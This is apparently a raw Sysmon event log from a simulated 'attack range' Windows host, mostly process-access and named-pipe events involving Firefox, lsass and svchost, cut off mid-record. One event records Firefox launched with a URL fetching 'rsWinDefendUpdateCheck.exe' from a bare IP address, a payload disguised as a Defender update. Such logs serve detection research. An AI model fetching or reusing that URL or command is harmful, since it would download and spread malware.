12:22:59.364{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.12279677497399393491C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.364{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.364{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.3.164118397C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.359{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406716C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.359{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko-crash-server-pipe.3240C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.336{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e7653c|C:\Program Files\Mozilla Firefox\xul.dll+e78bb2|C:\Program Files\Mozilla Firefox\xul.dll+c2d887|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+22fb48|C:\Program Files\Mozilla Firefox\xul.dll+1ff2ca|C:\Program Files\Mozilla Firefox\xul.dll+80a501|C:\Program Files\Mozilla Firefox\xul.dll+1859d07|C:\Program Files\Mozilla Firefox\xul.dll+1957601|C:\Program Files\Mozilla Firefox\xul.dll+1b5691f|C:\Program Files\Mozilla Firefox\xul.dll+1826987|C:\Program Files\Mozilla Firefox\xul.dll+1e7daf6 10341000x800000000000000043517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.335{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.331{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.331{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.330{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.330{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.330{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.329{FE4C2B44-E4A2-63C7-4806-00000000AF02}32407044C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.329{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3240.3.1641183976\1355514316" -childID 2 -isForBrowser -prefsHandle 3348 -prefMapHandle 3344 -prefsLen 31473 -prefMapSize 234522 -jsInitHandle 1108 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd8cbd7a-e8ae-4d0f-afe6-b68529e17300} 3240 "\\.\pipe\gecko-crash-server-pipe.3240" 3352 1d978414958 tabC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000043509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.329{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.328{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.327{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.327{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.327{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.327{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.327{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.327{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.326{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.326{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.326{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.326{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.326{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla 